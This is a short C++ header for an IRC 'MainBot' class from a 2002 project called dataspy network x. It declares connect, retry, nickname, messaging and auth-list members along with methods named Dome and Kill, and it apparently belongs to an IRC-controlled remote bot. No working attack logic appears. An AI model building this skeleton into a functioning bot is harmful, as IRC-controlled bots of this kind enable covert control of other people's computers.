 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	Mainbot.h - Header for the IRC Mainbot class.

	Last revised : 31st March 2002

  */

#ifndef _DSNX_MAINBOT_HEADER_H_
#define _DSNX_MAINBOT_HEADER_H_

#include <windows.h>
#include "../include/Clinkedlists.h"
#include "../include/DSNXSockets.h"

#define MAX_RETRIES 16
#define FIRST_CONNEC_TIME 120

class MainBot : public DSNXSocket {

public:
	MainBot(char*server,char*channel,USHORT port);
	~MainBot();

	DWORD Dome(LPVOID params);		
	DWORD Kill(LPVOID params);		
	void NewNick();
	void SendIRCMessage(char*message,char*to,char*where,BOOL bError);
	
	char *cChannel,
		my_nick[64];

	USHORT unique_nick_id;
	unsigned long unique;
	bool bBeenOnline;
	USHORT connection_retries;
	CLinkedList *auth;
};


void send_server_msg(char *msg, SOCKET s);


#endif //__INC_MAIN_BOT_H
